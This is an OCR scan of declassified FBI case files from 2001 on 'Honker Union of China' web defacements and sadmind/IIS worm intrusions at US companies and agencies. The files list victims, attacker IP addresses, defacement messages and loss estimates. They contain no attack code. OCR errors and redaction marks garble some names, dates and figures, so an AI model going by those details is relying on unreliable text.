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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/08/2001 


BOX USA GROUP, 2100 b6 
Sanders Road, Suite 200, Northbrook, Illinois, telephone number b7C 
was interviewed at his place of employment. After 
was advised of the identity of the interviewing agent and 


the nature of the interview, he provided the following information: 


GROUP, was also presen uring e interview. 


The attack was against a server running Windows NT 
Version 4.0. The server was for BOX USA GROUP's internal Web site. 
The attacker was able to access the server through a known 
vulnerability in Windows NT Version 4.0. There were no indications 
of attacks on the other servers that BOX USA GROUP has running. 
The other servers do not have the same vulnerability and are not as 
accessible as the server running Windows NT Version 4.0. b6 
believes that the attacker ran a "sniffer" and found the b7C 
vulnerability on the server. 


The attempt to deface the Web site was unsuccessful. 

was able to see the derogatory statements aimed at the 
United States in the log files. There are statements in the log 
files such as "Hacked by the Chinese" and "Hacked by Lion". There 
was no defacement to BOX USA GROUP's public Web page. 


The attackers were on the system for approximately twelve 
hours. During that time, they deleted files and gathered directory 
listings. The attacker did not erase any of their own files that 
they left behind and the tools used by the attacker were not very 
sophisticated. [ ^ ]believes that the tools left behind are b6 
not damaging to BOX USA GROUP's system. [ ^ |traced the tools bức 
used in the attack back to locations in China, Vietnam, Japan and 
Russia. The Internet Protocol (IP) addresses used in the attack 
were traced back to China. 


b6 


provided a printed sample of the log files kệ 


taken from the server. This sample has been placed in an FD-340 
Evidence Envelope. will forward the complete log and 
firewall files to the investigating agent via e-mail. 

will also forward a summary of the attack. The server will be 


Investigation on 05/08/2001 at Northbrook, Illinois 
b3 
File # Date dictated N/A b6 
b7C 
by sa| | b7E 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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backed up and a copy of the server's hard drive will be available 
to the investigating agent. 
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c. Y 
(01/26/1998) 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/14/2001 

To: Counter-Terrorism Attn:  NIPC 
Computer Investigations Unit 
Room 5965 
SSA 

vhicago L-SA 

312-907-8680 
NIPC Squad 


From: Pittsburgh 
Squad 16, NIPC 
Contact: SA 412-456-9281 
Approved By: 


Drafted By: 


case m e[L — — —] wes] | 


Title:  Honkers Union of China 
Computer Intrusion Matter 
LIONWORM; ADOREWORM; 

WEB PAGE DEFACEMENTS; 


Synopsis: Initial reporting of incidents at Pittsburgh, PA. 


Administrative: Reference Bureau GroupWise e-mails from SSA 
dated 5/2/2001 and 5/10/2001 to NIPC Supervisors. 


Details: For information of the Bureau and Chicago Offices, the 
Pittsburgh Division is in receipt of complaints from two victims 
in the Pittsburgh territory. The first victim is identified as 
ANSYS, Incorporated located at Southpointe, 275 Technology Drive, 
Canonsburg, PA 15317, telephone 724-746-3304.  ANSYS is a 
software company which develops simulation software and is a 
contractor for the Department of Defense (DoD) and the National 
Aeronautics and Space Administration (NASA).  ANSYS is a global 
corporation with offices in China, Japan, and Europe as well as 
the United States. The initial incident at ANSYS was reported on 


May 11, 2001 ccs is the Webmaster for ANSYS. 
umm m that the incident occurred on May 8, 2001 and 


affected the main www web server and the main web page index. 
The attack originate from three Unit Protocol (IP) addresses 
identified as follows: 

1. 205.128.201.237 

2. 202.97.28.24 

3s 
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b3 
b7E 


To:  Terrori : Pittsburgh 
Re: 05/14/2001 b3 


b7E 


An inquiry with the American Registry of Internet Numbers 
(ARIN) revealed that IP Address 205.128.201.237 is registered in 


the name Strayer College, 3045 Columbia Pike, Arlington, VA 22204 
and the C inator is identified (ss telephone b6 


b7C 


inquiry also revealed that IP Address 
is registered in the name j 
telephone 


An inquiry with the Asia-Pacific Network Information 
Center (APNIC) revealed that IP Address 202.97.28.24 is 
registered in the name Chinanet-BB and appears to be an Internet 
Back Bone for China Telecom with a registered address at A12, 
Xin-Jir-Kou-Wai Street, Unknown City in China telephone +86-10- 
62370437. 


It is believed that the above addresses in the United 
States may be compromised and are being used by the intruders to 
attack the ANSYS site.  ANSYS is running Windows 2000 machine 
with Internet Information Server, Version 5 with Service Pack 1. 
It is believed this version is vulnerable to compromise via the 
SADMIND/IIS Worm for which an alert was posted on the CERT Web 
Site on 5/8/2001. No additional information regarding the 
attacking sites is available at this time. Any decision to 
contact the attacking sites for interview is left to the 
discretion of the Chicago Division and NIPC.  ANSYS has patched 
their system and upgraded IIS software to a current more secure 
version. 


In addition, an Allegheny County government services web 
site was also attacked via similar exploitation with the 
sadmind/IIS Worm and investigation is being conducted to identify 
particulars of the compromise. Forensic examination by certified 
personnel is being conducted to preserve original evidence at 
this time. 


'Additional details will be forwarded to the Bureau and 
Chicago as appropriate. 


In addition, Pittsburgh Division currently has two SA's 
and a Computer Scientist detailed as FBI liaison's to the 
Computer Emergency Response Team (CERT) at Carnegie Mellon 
University (CMU). Attempts are being made to identify additional 
victims willing to report incidents to law enforcement for 
additional investigation. Any additional information developed 
in this regard will be provided to the Bureau and Chicago for 
follow-up. 


++ 


Terrorism From: 


Pittsburgh 
05/14/2001 


b3 
b7E 


zie 


FD-302 (Rev. 10-6-95) 


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/14/2001 


SAFEWAY b6 
b7C 


INSURANCE P (SAFEWAY), 

Illinois, telephone number 
was interviewed at his place of 

employment. er was advised as to the identities of the 


interviewing agents, he provided the following information: 


i Drive, Westmont, 


E-mail address 


The SAFEWAY Web site, www.safewayins.com, was defaced 
with the message "fuck USA Government fuck PoisonBOx 


contact:sysadmin@yahoo.com.cn". [| discovered the defacement b6 
on May 7, 2001. b7C 

has analyzed the server and determined that no 
information had been compromised. The hacker left an Internet b6 
server. rovided the investigating agents a copy of the 


log files on compact disc. 


Ihe hacked server is not currently running, SAFEWAY has a 
back up server that is handling the Web site at this time. 
SAFEWAY's Web site is not elaborate so one server is able to 
operate the Web site. There has not been any action against 
SAFEWAY's Web site since the initial defacement. 


Protocol ress that[ | was able to determine was still b7C 
running. has obtained the log files and repaired the 


| | Jestinatea SAFEWAY's loss at approximately s 
$10,000. DIE 
Investigation on 05/11/2001 at Westmont, Illinois i 

b3 

File # Date dictated N/A bế 
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by b7E 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/09/2001 
To: Counterterrorism Attn:  NIPC, CIOS/CIU 
Ro 
SA b3 
b6 
Chicago v aen: s[ — — T as 
b7E 


From:  Detroi 


Approved By: 


Drafted By: 2d ka ao 


Title: Subject:  Hacker/Honker Union of China 


Victim: Chicago Systems Group 
Type: Intrusion 
Date: 04/03/01 


SUBMISSION: D Initial & Supplemental L1 Closed 


CASE OPENED: H / 


CASE CLOSED: fd 


D No action due to state/local prosecution 

(Name/Number ) 

L] USA declination 

D Referred to Another Federal Agency 

(Name/Number: ) D Placed in unaddressed work 
D Closed administratively 

D Conviction 


COORDINATION: FBI Field Office: Chicago 
Government Agency 
Private Corporation 


Company name/Government agency: | Consumers Energy Corporation - 
Address/location: 1945 West Parnall Road 

Jackson, Michigan 49201 
Purpose of System: Post notifications regarding the status of Consumer's physical gas sites and 
receive information from gas broker companies on details of gas being placed into the 
Consumer's system. 


b3 
b7E 


To: , B From: Detroit : 
Re: Date 05/09/2001 b3 
b7E 


Highest classification of information stored in system: N/A 


System Data: 
Hardware/configuration (CPU): Generic PC running a Pentium III processor. 
Operating System: Windows NT 4.0 service pack 6A. 
Software: MicroSoft Front Page, MicroSoft IIS version 4, and a Powerbuilder 
executable which synced with a SQL Server Database (separate server). 


Security Features: 


Security Software Installed: O yes (identify ) S no 


Logon Warning Banner: 0 yes 8 no 
INTRUSION INFORMATION 


Access for intrusion: D Internet connection O dial-up number O LAN (insider) 
If Internet: Internet address: 1.206.10.45 
Network name: WWNW.gasnoms.consumersenergy.com 


Method: 
Technique(s) used in intrusion: MicroSoft IIS Extended Unicode Directory 
Traversal Vulnerability (also Sadminds/IlSworm) 


Path of intrusion: 
addresses: 1. 211.97.114.240 2. 202.234.209 .2 3. 134.241.140.239 
country: 1. China 2. Japan 3. USA 
facility: 1. China United Telecom Corp 2. Japan Network Info Center 
3. Massachusetts Higher Ed Computer Network 


Subject: 
Age: Race: 
Sex: Education: 
Alias(s): Motive: 
Group Affiliation: 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 


Operating System: 
Software: 


` 


To: Counterterrorism From: Detroit 8 


ES 


a hy 


Impact: 


Re:[_ EE 05/09/2001 


Compromise of classified information: O yes & no 
Estimated number of computers affected: One 


Estimated dollar loss to date: 
Category of Crime: 


Impairment: 
D Malicious code inserted 
D Denial of service 
C] Destruction of information/software 
& Modification of information/software 


$5000 


Theft of Information: 

D Classified information compromised 

D Unclassified information compromised 
O Passwords obtained 
O Computer processing time obtained 


O Telephone services obtained 
O Application software obtained 
L1 Operating software obtained 
Intrusion: 
& Unauthorized access 
O Exceeding authorized access 


REMARKS 


The victim site, www.gasnoms.consumersenergy.com, is used for two 
things: to post the status of Consumers’ physical gas sites and 
to run a PowerBuilder program which allows gas companies to enter 
information into a database pertaining to gas that they put into 
the Consumers Energy gas system (an auditing system of sorts). 
This system has been mandated by the Federal Energy Regulatory 
Commission (FERC); but it's impairment does not critically affect 
the company's ability to provide gas or energy. 

There is a firewall which protects a large portion of the 
Consumers' network. 

A customer from Detroit Edison (another energy company) noticed 
that her link to a part of the victim site was not working. She 
went to the main site and saw the "Fuck USA Government", "Fuck 
Poizon BOx", and "Contact sysadmcneyahoo.com.cn". 


++ 
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FEDERAL BUREAU OF INVESTIGATION 


(Rev. 08-28-2000) 


Precedence: ROUTINE Date: 05/11/2001 


To: Chicago ⁄ Attn: SN O |] 


From: Detroit 
Squad C-12/Ann Arbor Ra 
Contact: SA 


Approved By: 


Drafted By: al p2.eo) 


Case ID #: 


Title:  Hacker/Honker Union of China; 
Chicago Systems Group - Victim 
Computer Intrusion 


UNSUB (S); 

Consumers Energy Corporation, 
Jackson, Michigan - Victim; 
Computer Intrusion, Impairment 


ee 


Synopsis: To advise of additional IP addresses for servers 
originating the Sadminds/IIS worm attack on Consumers Energy. 


Details: On May 11, a a Energy 
Internet Infrastructure, provided the following IP addresses of 
servers attempting attacks on their network using the 


Sadminds/IIS worm: 


12.44.37.253 on May 6, 2001 
Assigned to Lincom, Inc, Los Angeles, CA 


211.251.218.5 on May 7, 2001 
Assigned to Korea Network Information Center 


210.99.71.1 on May 9, 2001 
Assigned to National Computerization Agency, Korea 


206.31.80.252 on May 10, 2001 
Assigned to ISP Channel, Mountain View, CA 


To: Chicago EK. MM e 
ne; [denso T b3 


b7E 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO 


Read and clear. 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/10/01 


On May 8, 2001, the following Consumers Energy 
employees attended a meeting with interviewing agent regarding 
the recent intrusion and webpage defacement of a Consumers 

‘s website: 


The meeting was held at the Consumers Energy 
Corporate Head Quarters, 1945 Parnall, Jackson, Michigan, 49201, 
(517) 788-0528. 


pd d events as such: he received a 
telephone ca rom Detroit Edison, with 


notification that the Gas Nomination website, 
"www.gasnoms.consumersenergy.com", had been replaced with an 
obscene, anti-U.S. Government slogan. eee and found 
that the files index.html, index.asp, default.html, and 
default.asp, had all been replaced to show a slogan which read 
"fuck USA Government", " izonBOx", and "contact 

. Sysadmcneyahoo.com.cn". In took the web server 
offline. He explained tha e server only hosts the "gasnoms" 
Site; which is used by approximately 100 gas broker companies to 
get information on Consumers' physical gas sites, and to input 
information into an auditing system for gas distribution; such as 
how much gas they placed into Consumers' lines, where they 
connected, etc. The gasnoms program is executed by a 
PowerBuilder frontend GUI on this server, which connects to a 
Separate server running the main application, via port 1999. 
Another server runs MicroSoft SQLserver which databases the 
information. The application is password accessible only. An 
investigation showed that neither of the two latter servers were 
affected. l 


commented on the history of 
the gasnoms site: the Federal Energy Regulatory Commission 
(FERC) mandates that a system which provides functionality 
similar to gasnoms, be available to gas broker companies. 
Actually, the PowerBuilder program they use was recommenced by 
FERC. The system is mainly used for auditing purposes, although 


Investigation on 05/08/01 at Jackson, Michigan 


File # Date dictated 


by 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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they use the gasnoms website to post the status of their physical 
gas sites. The impairment of the gasnoms system in no way 
hinders gas broker companies from providing gas to Consumers. It 
would revert to telephone calls and facsimiles. 


advised that the gasnoms server is running b6 
MicroSoft Windows NT, version 4.0, service pack 6A, and MicroSoft b7C 
IIS. He checked the IIS logs and found the connections which 
performed the intrusion. He described it as consecutive HTTP 
commands which took advantage of an existing flaw in Windows NT 
and IIS. These were used to overwrite the four files with the 
obscene language (supra). [V — ]provided copies of the IIS 
logs showing the intrusions; he clarified that the times are 
Greenwich Mean Time (GMT). 


[| advised that their network topology includes a b6 
firewall, as well as a reverse-proxy server. The gasnoms sites b7C 
is behind the firewall, but not the reverse-proxy. The reverse- 
proxy blocked the attempts.as "malformed URL requests". The 


firewall logged the connections, pos a e Still in the 
process of examining those logs. He also advised that the 
"attacks" are still being executed against their network. 


advised that, as normal procedure, she b6 
notified one of the originating companies via e-mail of the b7C 
incident, and recommended that they investigate and terminate the 
attacks. The company was China United Telecommunications 
Corporation, "cnuninet.net". 
believes that Consumers Energy has already b6 
expended over $5000 in investigative time on this incident, due bic 


to some of the critical systems which could have been affected. 


On May 10, 2001,[ leont acted writer and provided 
copies’ of the firewall logs showing unsuccessful attempts and 
MicroSoft IIS logs which contain only the malicious entries. He 
advised that attempts are still being made, and are being blocked 
and logged; he will continue to provide the IP addresses of those 
servers. There are three originating IP addresses for the 
attacks: 211.97.114.240 (China United Telecommunications 
Corporation), 202.234.209.2 (DoCoMo Service Kansai Co), and 
134.241.140.239 (Massachusetts Higher Education Network). 


FD-302a (Rev. 10-6-95) 
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Copies of the altered files (index and default), the 
IIS log files from ^  ](ex010507.1og and ex010508.log), and 
the firewall and extract IIS logs (logfiles.txt) have been placed 
on a 3.5" diskette and placed in the 1-A section of this file. 


Attached and made part hereto is a co of logfiles.txt 
the firewall and extract IIS logs), as well T NEN 
n— internation on the three originating 
addresses. 


ATTACHMENT 
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(Rev. 08-28-2000) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/11/2001 


P Chicago Attn: SA 


(312) 431-1333 


From: San Francisco 
14B/Hayward 
Contact: SA 


(510) 886-7447 


Approved By: 
Drafted By: 
Case ID d: 
Title:  Honkers Union of China 


Synopsis: Forward materials from victims in the San Francisco 
Division of web defacements originating in China. 


Reference: i E e- Pone fron[__] to NIPC Supv., 


2001, nkers Union of China] ] 
signed ` NIPC Computer 


Investigations Unit. 
Enclosures: Twenty Nine (29) victim information documents. 


Details: The San Francisco Division is forwarding the enclosed 
victim information/materials to the Chicago Division, case file 
The materials include FD-71's, e-mails, and NIPC 
atch Reports from victim companies. In some cases, logs, copies 
of the defacement, and other information provided by the victims 
is provided. 


The San Francisco Division will continue to forward 
victims/information as necessary. 


lf there are any questions or comments, contact SA 
Hayward RA, (510) 886-7447. 


b3 
b6 
Gris 
b7E 


b3 
b6 
b"7C 
b7E 


b3 
b7E 


b6 
b7C 


To: Chị m: San Francisco 
Re: 05/11/2001 b3 


` b7E 


LEAD (s): 
Set Lead 1: 
CHICAGO 
AT CHICAGO 
Read and Clear 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/02/2001 


boa CHICAGO 
SYSTEMS GROUP (CGS), venue, Suite 3200, Chicago, 


Illinois e-mail address 

was interviewed at his place of 
was advised as to the identities of the 
interviewing agent and computer scientist, he provided the 
following information: 


Approximately two weeks before the attack on the Illinois 
Secretary of State computer system, [ ]personai web site, 
== was defaced. The group claiming responsibility for the 
efacement was "Li0n Group", and the message displayed on the Web 
page was "Kill all Japanese". 


The server for the Web site was a Linux box utilizing the 
Red Hat 7.0 operating oe machine has been shut down by 
Since the attack. believes that the attack was not 
directly aimed at his Web site, but that the hackers were 
attempting to use his Web site as a jumping off site to attack 
another Web site. 


| - CSG, analyze the server and e-mail 


the results to the investigating agent. 


Investigation on 05/02/2001 at Chicago, Illinois 


File # 


Date dictated N/A 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/11/2001 


To: Chicago” Attn: sal 


From: Detroit 
Squad C-12/Ann Arbor Ra 
Contact: SA 


(Gah. sei 


Approved By: 


Drafted By: 


Gil ba sei 


Case ID ii: 


Title:  Hacker/Honker Union of China; 
Chicago Systems Group - Victim 
Computer Intrusion 


E 


UNSUB (S) ; 

Consumers Energy Corporation, 
Jackson, Michigan - Victim; 
Computer Intrusion, Impairment 


Synopsis: Forwarding all information pertaining to the use of 
the Sadminds/IIS worm against Consumers Energy Corporation for 
Chicago's coordination. Copy of information to Detroit Control 
file. 


Enclosures: For Chicago are: a 1-A envelope containing one (1) 
3.5" diskette with files obtained from victim; one FD-302 with 
attachments re interview with victim. For Detroit is one FD-302 
re victim interview. 


Details: On May 8, 2001, Consumers Energy Corporation, Jackson, 
Michigan, contacted the Ann Arbor FBI to advise of a compromise 
of their gas nomination website, 
"www.gasnoms.consumersenergy.com". Following an interview with 
numerous Consumers Energy personnel, it was evident that the only 
damage was the replacement of the index.html, default.html, 
index.asp, and default.asp files; which produced a new website 


yielding the slogan "fuck USA government", "fuck Poizon BOx", and 
"contact sysadmen@yahoo.com.cn". Pertinent files and logs were 
obtained. 
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| b3 
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To: Chicago A Detroit 
Re: L 05/12/2001 


On May 9, 2001 en the CERT advisory CA- b6 
2001-11, which details the adminds/IIS" worm; and conformed to b7C 
the Consumers Energy incident. 


n contacting FBIHO NIPC/CIU, aal ^ ]was advised by 
SA that SA has a case open and is 
coordinating the investigation of this worm attack. 


SAL — ]is forwarding all pertinent information re the 
attack on Consumers Energy to captioned Chicago case, as well as 
a copy to the Detroit control file. 


To: _ Chica d Detroit 
Re: 05/11/2001 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO 


Read and clear. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/10/2001 


To: St. Louis Attn: aal sd 2 


CART FE b6 


Chicago Attn: `. _ BIS 
NI qua BTE 


From: St. Louis 
Squad 3 
Contact: 


SA Ext. 2719 


Approved 


Drafted 


Title: HONKER UNION OF CHINA; 
CHICAGO SYSTEMS GROUP 


Synopsis: Request CART FE c i mirror images b6 
of two separate server hard drives and conduct examination for . bre 
intrusion activity, commands and IP addresses. 


Attachments: A copy of a handwritten document provided bal! 
which list the file names deleted, passwords, websites and 
financial losses. 


Details: On May 9, 2001,  ---—À ÀÀ St. Louis b6 
Division, telephonically contacted Electric man b?7C 
Internet Services, 754 Longlane Road, New Lenox, Illinois, 60451, 
telephone number | ane rad that his Web 
Hosting and Development business was attacked by Chinese hackers. 

had filed a complaint with the St. Louis Division about the 


incident on 05/06/01. [____|servers are located at Cybercon, 
210 N. Tucker, St. Louis, Missouri. 


The first of two attacks was discovered on Sunday 
05/06/01 at 9AM and involved a server of 53 customer web sites. 
The attackers placed the China flag, music (possible national 
anthem of China), and political statements about the United 
States and President George W. Bush. The attackers deleted all 
the customer website files and deleted the logs of their 
intrusion activity. 


The second attack occurred on Monday, 05/07/01 at 
2:02PM. T had been remotely working with the Testing and b6 
Development server and left to run an errand at 1PM. Upon his b7C 
return,[ ]|ảiscovered that the server had been attacked. The 


UPLOADED TO ACS/EOB . i 


BY SL, S/I b6 
— 2 b7E 


To: St. Louis From: St. Louis 
Re: Pod, 05/10/2001 


Log and the Service Log. [was unable to reboot the server 
because the executable files had been deleted. The attackers had 
created new directories with the names “Fuck”, “Fuck You”, etc. 

The Website had the message: Honker Union of China, Hacked by 
Redfreedom, USA=NAZI, .Bush=Murderer, Beat Down Imperialism of 
America!. 


SAL. ]contactedL__ len 05/10/01 for an interview 
and to collect the two servers for examinations. [ Jadvised 
that he had a backup of the code for the websites and was in the 
process of trying to recreate the websites. Some of 
customers had already oontactedl ` ` ] and were advised of the 
attacks. advised that he was a self taught web page 
designer. was not sure if the second attack on his 
Test/Development Server was the same hacker, because the 
defacement was different. 


Server on Friday, 05/04/01 to prevent an intrusion. is not 
Sure if the attacker had already gain access before the patch was 
installed and placed a back door for re-entry. 


[haa installed patches to his ia qu E 


On May 9, 2001, pL aa y contacted the 
NIPC Unit at HQ and was advi at Chicago would be the 
regional office for all China Web Defacement cases. SA 
telephonically contacted the Chicago Division and talked with SA 
fa who will be the case agent for the China attacks. 
provided SA[ ^ ]with the file number[ ^ č |for the 
China attacks. 


On May 10, 2001, a bureau E-mail was sent out to the 
NIPC field supervisors advising of the Honker Union of China 
attacks utilizing the Lion worm which has been causing DDoS 
attacks. 


b3 
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To: St. Lois From: St. Louis 


Re: , 05/10/2001 
LEAD (s): 
Set Lead 1: (Adm) 

ST. LOUIS 


AT ST. LOUIS, MISSOURI 


Request CART FE enl |coreate a mirror 
image of the two separate server hard drives. Examine the copies 
of the har d 


are located in the evidence room. Also searc 


Set Lead 2: 
CHICAGO 


AT CHICAGO, ILLINOIS 


For information only. 


isd "bi. ee 
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FD-302 (Rev. 10-6-95) e 


` E 1 a 
FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/09/2001 


SyTec 
Business Solutions (SyTec), 19 West Hargett Street, Suite 900, 
Raleigh, NC 27601, Telephone number|[ ^ ^ ^ ^ ] was advised of 
the identity of the interviewing agent and the purpose of the 


interview. ent and contributing to the intervi 
SyTec and 
ylec. During the interview 


following information: 


The SyTec computer system is connected to the Internet 
behind a router and a Cisco Systems PIX firewall. The PIX firewall 
is located between the router and the SyTec computer system. The 
SyTec system is comprised of several computers to include computers 
named: Saturn, Jupiter, Neptune, and Alexis. Additionally, 
printers and client machines are part of the SyTec computer system. 


The Jupiter computer was intruded into from China. This 
began on 04/06/01 when Jupiter, housing the SyTec web server, 
running the Windows 2000 Operating System (OS) and Microsoft IIS 
5.0, was connected to from the Internet Protocol (IP) address of 
61.153.115.113, during this connection the web pages were viewed 
and scripts were copied. This was followed by connections on 
04/07/01, beginning approximately 7:15am, from an IP address of 
211.94.201.200. During this intrusion the Service Account Manager 
(SAM) was taken from the system. The IP's associated with the 
intrusions resolve to computers located in China. 


Similar connections were made to the Alexis computer 
which was also running the Windows 2000 OS and Microsoft IIS 5.0. 
This computer was used for web connections by SyTec employees to 
access their E-mail. Connections to Alexis from China were from 
the following IP addresses:  61.153.115.113, 61.157.222.11, 
61.147.9.11, and 61.147.5.135, which resolve to computers located 
in China. The "MainLogonFrame" web page on Alexis was changed to: 


HACKED BY Q.C FROM CHINA!DON'T SPY US ANY LONGER! 
:) 2 
:) 

TMD 


Investigation on 


Raleigh, NC 


File # Date dictated 05/09/01 


by 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 


Dem gez. ec 
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This change to the web page was found on 04/07/01 at approximately 
10:00am. Ee this web page during the 6:00pm Co 
8:00pm time frame on 04/07/01. 


At approximately 10pm on 04/07/01,L_____ ] discovered 
the "MainLogonFrame" web page on Alexis had been changed to: 


sorry! hacked by q.c from china! don't spy us any more! :) 
| lrepai red this page again on 04/08/01. 


[| believed "Ccc.exe" and "cmd.exe" were put on 
the SyTec computers and were an integral part of the intrusion. 


HEMTWEE . their company had a higher profile in 
recent weeks following an advertizement which SyTec posted on the 
web site "computerjobs.com". 


Recovering from these intrusions required approximately 
fifteen (15) work hours at an internal cost to SyTec of fifty 
dollars per hour ($50/hr). 


provided hardcopies of logs, original and 
hacked web pages, and IP lookups during the intervi 
Furthermore, as agreed to during the interview] | 
subsequently provided copies of the IIS and PIX logs via E-mail. 


The aforementioned copies are retained in the 1-A subsection of 
this case file. 
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|. FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/10/2001 
To: Chicago Attn: IP 
SA b3 
b6 
From: Charlotte bức 
b7E 


Squad 7, Raleigh Resident Agenc 
Approved By: 
Drafted By: 


Case ID #: (Pending) 


Title: HACKER/HONKER UNION OF CHINA; 
ILLINOIS SECRETARY OF STATE - VICTIM; 
INTRUSION - INFO SYSTEMS 
04/03/2001 
00: CG 


Synopsis: Various entities in North Carolina have experienced 
intrusions and attempted intrusions from UNSUB(S) emanating from 
Internet Protocol (IP) addresses resolving back to China. Other 
intrusions employing the sadmind/IIS Worm, as described in the 
CERT Advisory CA-2001-11, and possibly attributable to 
individuals in China have also been reported. Both financial and 
data losses in all cases have been minimal. This information is 
being forwarded to Chicago for whatever action deemed 
appropriate. No further investigation will be conducted by 
Charlotte at this time. 


Administrative: Reference telcals on 05/09/01, between SA 


NIPC, and sa| land Case b6 


a 
Agent, SA Chicago Division. b7C 


Enclosure(s): (7) Enclosed for Chicago are an original and one 
copy of an FD-302 documenting a 04/18/01 interview at SyTec 
Business Solutions (SyTec), one 1-A envelope containing documents 
obtained from SyTec or regarding the 04/18 interview, one 1-A 
envelope containing documents regarding an intrusion into the 
State of North Carolina's computer system, one 1-A envelope 
containing documents from SyTec regarding an intrusion into Craig 
Davis Properties' computer system, one 1-A envelope containing 
documents regarding an intrusion into Aerial Images! computer 
System, and one 1-A envelope containing documents regarding an 
intrusion into EPA's computer system. 


b3 
b6 
asp. ec L d$ 


b7E 
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To: Chicago From: Charlotte 
re: [05/10/2003 


Details: Various entities in North Carolina have experienced 
intrusions and attempted intrusions from UNSUB(S) emanating from 
Internet Protocol (IP) addresses resolving back to China. One 
such victim was SyTec Business Solutions (SyTec), 19 West Hargett 
Street, Suite 900, Raleigh, NC 27601, Telephone number: 919-856- 
2300. Details of_the intrusions, occurring early April, 2001 
were provided by 

SyTec and are documented in the enclosed FD-302. SyTec computers 
running the Windows 2000 Operating System (OS) and Microsoft IIS 
5.0, were connected to from the Internet Protocol (IP) addresses 
of 61.153.115.113, 211.94.201.200, 61.157.222.11, 61.147.9.11, 
and 61.147.5.135. These IP's resolve to computers located in 
China. 


On 04/19/01, 

State of North Carolina, Office of Information Technology 
Services, telephone number: advised a server in the 
governor's office had been compromised from an IP address of 
211.99.199.75. This IP resolves to www.netxeyes.com, a computer 
in China. The compromised server was set up to be a master for a 
Distributed Denial of Service (DDoS) attack. After identifying 
the intrusion, cleaned the intruder's files off of the 
system and ensured patches were properly installed. As a result, 
the DDoS attack was never launched. Information obtained from 

is provided in an enclosed 1-A envelope. [ ]is willing to 
provide further assistance should he be requested to do so. 


On 05/03/01, ^ ^ ^ ]Special Agent, 
Environmental Protection Agency (EPA), Office of the Inspector 
General (OIG), Office of Investigation, 401 M Street, MC 2431, 
Washington, DC 20460, telephone number: |(office), 
[n (cell), advised a computer at the EPA's facility in 
Research Triangle Park, NC was compromised. This intrusion 
emanated from an IP address of 202.110.94.135, which resolves to 
a computer located in China. The victim machine's web page was 
altered to display Chinese characters, which when translated 
stated something to the effect: PROTECT CHINA'S UNITY, INSIST ON 
ONE CHINA. sal advised the EPA OIG was interested in 
pursuing this matter jointly with the FBI. 


Other intrusions employing the sadmind/IIS Worm, as 
described in the CERT Advisory CA-2001-11, and possibly 
attributable to individuals in China have also been reported. 
Attached to and considered part of this EC is a copy of the CERT 
Advisory CA-2001-11 which explains in detail the employed attack. 


Attacks associated with this attack methodology 
include: 
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To: Chicago From: Charlotte © 
Re: [CÔ 7] 05/10/2001 


An intrusion and defacement of a web paqe for Crai 
Davis Properties located in Raleigh, NC, pc | 
telephone number:[ ^  .] This web site was hoste 


y 
SyTec and defaced over the wee 05-06/01. In attemptin 
Eo 1 576221đ5E2 Chis lHiihdl EE 
telephone number: who represents the vendor for a 


telephony system which was running on the Craig Davis Properties 
NT server. advised two other computers running the same 
telephony system were also victimized over the weekend of 05/05- 
06/01. The intrusion into the Craig Davis Properties NT server 
emanated from an IP address of: 200.36.108.8, which resolves to a 
computer located in Mexico. Information provided b 
as well as an IP lookup, is provided in an enclosed 1-A envelope. 
is willing to provide further assistance should he be 
requested to do so. 


An intrusion and defacement of a web page run by Aerial 
Images located at 615 Hillsborough St, Raleigh, NC was reported 


on 05/08/01 by telephone number: 919-833-9662, 
extension e web page was Aerial Images' "terranova" web 
site. identified the intrusions as emanating from IP 


addresses of 148.220.16.251 and 209.211.205.56. The 
148.220.16.251 IP resolves to a computer located in Mexico, and 
the 209.211.205.56 IP address resolves back to LCI International. 
Information provided by[ ` ] as well as an IP lookup, is 
provided in an enclosed 1-A envelope. is willing to 
provide further assistance should he be requested to do so. 


An intrusion and defacement of a web page hosted by 
Utenzi Corporation, P.O. Box 13479, 808 Aviation Parkway, Suite 


C 27708-3479, was reported by 
, telephone number 919-852-0690. 
advised he had dissected the hack and was willing to 


rovide further assistance. After speaking with the NIPC, SA 
Charlotte Division, Raleigh Resident Agency, 
instructe to E-mail his analysis to pee 


FBIHO, NIPC. 


Unsuccessful probes were reported SES 

dvanced PC, 413 S Hughes Street, Apex, NC 27502. 
Advanced PC provides Information Security services to its 
customers. The probes[ —  ]identified were from IP addresses 
61.139.59.73 and 61.142.242.231 which resolve to computers 
located in China, as well as an IP address of 211.60.222.160 
which resolves to a computer located in Korea. No probes 
resulted in intrusions; however, due he nature of the probes 
and the current tensions with cise, [believed he should 
report the probes. 
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To: Chicago From: PE. te e 
Res [  — — H 05/10/2001 ps 
2 b7E 


In all the aforementioned cases, both financial and 
data losses have been minimal. 


This information is being forwarded to Chicago for 
whatever action deemed appropriate. No further investigation 
will be conducted by Charlotte at this time. 


To: Chicago "me ON 
Re: aa 05/10/2001 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 


AT CHICAGO, IL 


Read and Clear. 
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CERT Advisory CA-2001-11 
sadmind/IIS Worm 


Original release date: May 08, 2001 
Last revised: May 08, 2001 
Source: CERT/CC 


train 
